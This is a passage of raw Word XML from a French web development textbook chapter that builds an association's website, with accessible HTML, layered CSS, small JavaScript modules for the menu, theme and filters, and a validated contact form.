        <w:br/>
        <w:t>&lt;img src="assets/images/logo.svg" alt="Association culturelle" width="140"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        height="40"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/a&gt;</w:t>
        <w:br/>
        <w:t>&lt;button class="menu__bouton" aria-expanded="false"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      aria-controls="menu-principal"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      Menu</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/button&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;nav id="menu-principal" aria-label="Navigation principale"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;li&gt;&lt;a href="/" aria-current="page"&gt;Accueil&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;li&gt;&lt;a href="/programmes.html"&gt;Programmes&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;li&gt;&lt;a href="/contact.html"&gt;Contact&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;/ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/nav&gt;</w:t>
        <w:br/>
        <w:t>&lt;button id="bascule-theme" type="button" aria-pressed="false"&gt;Thème</w:t>
        <w:br/>
        <w:t xml:space="preserve">      sombre&lt;/button&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/header&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;main id="contenu"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;h1&gt;Nos programmes&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;!-- contenu --&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/main&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;footer class="pied"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;p&gt;© 2026 Association culturelle&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;a href="/mentions.html"&gt;Mentions légales&lt;/a&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/footer&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trois détails font la différence : le lien d'évitement en première position, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-current="page"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur le lien actif, et un seul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> par page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>36.4 Étape 3 : les styles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les styles s'organisent en trois couches : les fondations (variables, réinitialisation, typographie), les composants (boutons, cartes, formulaires) et les pages (dispositions spécifiques).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une couche de fondations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base.css — variables et fondations */</w:t>
        <w:br/>
        <w:t>:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --navy: #0f2e4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --amber: #e0a21b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ink: #1f2933;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --mist: #e8edf1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --fond: #ffffff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte: var(--ink);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  --espace-1: .5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-2: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-3: 2rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-4: 4rem;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  --taille-0: clamp(1rem, .96rem + .2vw, 1.125rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --taille-1: clamp(1.2rem, 1.1rem + .5vw, 1.45rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --taille-2: clamp(1.44rem, 1.26rem + .9vw, 1.9rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --taille-3: clamp(1.73rem, 1.44rem + 1.4vw, 2.5rem);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  --rayon: 8px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --duree: 160ms;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>[data-theme="sombre"] {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --fond: #0b1622;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte: #e8edf1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --mist: #1b2c3d;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>*, *::before, *::after { box-sizing: border-box; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>body {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-family: "Inter", system-ui, sans-serif;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-size: var(--taille-0);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  line-height: 1.6;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: var(--texte);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: var(--fond);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>:focus-visible {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  outline: 3px solid var(--amber);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  outline-offset: 3px;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un composant réutilisable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composants.css — la carte de programme */</w:t>
        <w:br/>
        <w:t>.carte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: grid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: var(--espace-1);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: var(--espace-2);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 1px solid var(--mist);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: var(--rayon);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: var(--fond);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.carte__titre { font-size: var(--taille-1); margin: 0; }</w:t>
        <w:br/>
        <w:t>.carte__meta { color: #5b6770; font-size: .9em; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>@media (prefers-reduced-motion: no-preference) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte { transition: transform var(--duree) ease; }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte:hover { transform: translateY(-2px); }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une mise en page qui s'adapte seule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pages.css — la grille des programmes */</w:t>
        <w:br/>
        <w:t>.grille-programmes {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: grid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: var(--espace-2);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-columns: repeat(auto-fit, minmax(min(100%, 18rem), 1fr));</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.conteneur {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: min(100% - 2 * var(--espace-2), 68rem);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin-inline: auto;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.section { padding-block: var(--espace-4); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min(100%, 18rem)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>minmax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche une carte de dépasser la largeur de l'écran sur mobile : c'est le détail qui distingue une grille robuste d'une grille qui déborde.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>36.5 Étape 4 : l'interactivité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois comportements suffisent : le menu mobile, la bascule de thème et le filtre des programmes. Chacun est un module indépendant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un module qui possède son état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modules/menu.js</w:t>
        <w:br/>
        <w:t>export function initialiserMenu() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const bouton = document.querySelector(".menu__bouton");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const nav = document.querySelector("#menu-principal");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!bouton || !nav) return;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  const basculer = (ouvrir) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    bouton.setAttribute("aria-expanded", String(ouvrir));</w:t>
        <w:br/>
        <w:t xml:space="preserve">    nav.classList.toggle("est-ouvert", ouvrir);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  };</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  bouton.addEventListener("click", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    basculer(bouton.getAttribute("aria-expanded") !== "true");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  nav.addEventListener("keydown", (e) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (e.key === "Escape") { basculer(false); bouton.focus(); }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un thème persistant et partagé entre onglets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modules/theme.js</w:t>
        <w:br/>
        <w:t>const CLE = "theme";</w:t>
        <w:br/>
        <w:t>const VALEURS = ["clair", "sombre", "auto"];</w:t>
        <w:br/>
        <w:br/>
        <w:t>function appliquer(valeur) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const theme = VALEURS.includes(valeur) ? valeur : "auto";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  document.documentElement.dataset.theme = theme === "auto"</w:t>
        <w:br/>
        <w:t>? (matchMedia("(prefers-color-scheme: dark)").matches ? "sombre" : "clair")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    : theme;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return theme;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>export function initialiserTheme() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const bouton = document.querySelector("#bascule-theme");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  appliquer(localStorage.getItem(CLE));</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  bouton.addEventListener("click", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const sombre = document.documentElement.dataset.theme === "sombre";</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const suivant = sombre ? "clair" : "sombre";</w:t>
        <w:br/>
        <w:t xml:space="preserve">    localStorage.setItem(CLE, suivant);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    appliquer(suivant);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    bouton.setAttribute("aria-pressed", String(!sombre));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  window.addEventListener("storage", (e) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (e.key === CLE) appliquer(e.newValue);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un filtre avec compteur annoncé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modules/filtres.js</w:t>
        <w:br/>
        <w:t>export function initialiserFiltres() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const groupe = document.querySelector("[data-filtres]");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const cartes = [...document.querySelectorAll("[data-theme-carte]")];</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!groupe) return;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  groupe.addEventListener("click", (e) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const bouton = e.target.closest("[data-filtre]");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (!bouton) return;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    groupe.querySelectorAll("[data-filtre]").forEach((b) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      b.setAttribute("aria-pressed", String(b === bouton));</w:t>
        <w:br/>
        <w:t xml:space="preserve">    });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    const filtre = bouton.dataset.filtre;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cartes.forEach((carte) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      carte.hidden = filtre !== "tous" &amp;&amp; carte.dataset.themeCarte !== filtre;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    const visibles = cartes.filter((c) =&gt; !c.hidden).length;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    document.querySelector("[data-compteur]").textContent =</w:t>
        <w:br/>
        <w:t xml:space="preserve">      `${visibles} programme${visibles &gt; 1 ? "s" : ""}`;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w: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UN POINT D'ENTRÉE UNIQUE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>app.js</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> importe les trois modules et les initialise. Chaque module gère ses intérêts et ne connaît pas les autres : l'ordre d'initialisation n'a pas d'importance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>36.6 Étape 5 : le formulaire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La page de contact comporte quatre champs et une case de consentement. La validation reprend exactement les principes du chapitre 28.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un formulaire complet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&lt;form id="inscription" novalidate&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="champ"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;label for="nom"&gt;Nom complet&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input id="nom" name="nom" autocomplete="name" required minlength="2"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="champ"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;label for="courriel"&gt;Adresse électronique&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input id="courriel" name="courriel" type="email"</w:t>
        <w:br/>
        <w:t xml:space="preserve">           autocomplete="email" required aria-describedby="courriel-aide"&gt;</w:t>
        <w:br/>
        <w:t>&lt;p id="courriel-aide" class="aide"&gt;Nous ne partagerons jamais votre</w:t>
        <w:br/>
        <w:t xml:space="preserve">      adresse.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="champ"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;label for="motif"&gt;Motif du contact&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;select id="motif" name="motif" required&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;option value=""&gt;Choisir…&lt;/option&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;option&gt;Inscription&lt;/option&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;option&gt;Bénévolat&lt;/option&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;option&gt;Autre&lt;/option&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/select&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="champ"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;label for="message"&gt;Message&lt;/label&gt;</w:t>
        <w:br/>
        <w:t>&lt;textarea id="message" name="message" rows="6" required</w:t>
        <w:br/>
        <w:t xml:space="preserve">      minlength="20"&gt;&lt;/textarea&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;label class="consentement"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;input type="checkbox" name="consentement" required&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    J'accepte de recevoir la lettre d'information.</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/label&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  &lt;button type="submit"&gt;Envoyer&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un envoi qui préserve la saisie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modules/formulaire.js</w:t>
        <w:br/>
        <w:t>export function initialiserFormulaire() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const form = document.querySelector("#inscription");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!form) return;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  form.addEventListener("submit", async (e) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    e.preventDefault();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (!form.checkValidity()) { form.reportValidity(); return; }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    const bouton = form.querySelector("button[type=submit]");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    bouton.disabled = true;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    bouton.setAttribute("aria-busy", "true");</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      await envoyer(Object.fromEntries(new FormData(form)));</w:t>
        <w:br/>
        <w:t xml:space="preserve">      afficherMessage("Merci, votre message est envoyé.", "succes");</w:t>
        <w:br/>
        <w:t xml:space="preserve">      form.reset();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    } catch (erreur) {</w:t>
        <w:br/>
        <w:t>afficherMessage("L'envoi a échoué. Vos données sont conservées.", "erreur");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    } finally {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      bouton.disabled = false;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      bouton.removeAttribute("aria-busy");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>36.7 Étape 6 : qualité avant publication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Avant de publier, cinq contrôles systématiques évitent la majorité des désagréments. Aucun ne demande plus de dix minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.116 — Cinq contrôles avant publication</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51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Contrôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="339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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="310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Critère</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2512"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Validation HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3399"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>W3C Validator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3103"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
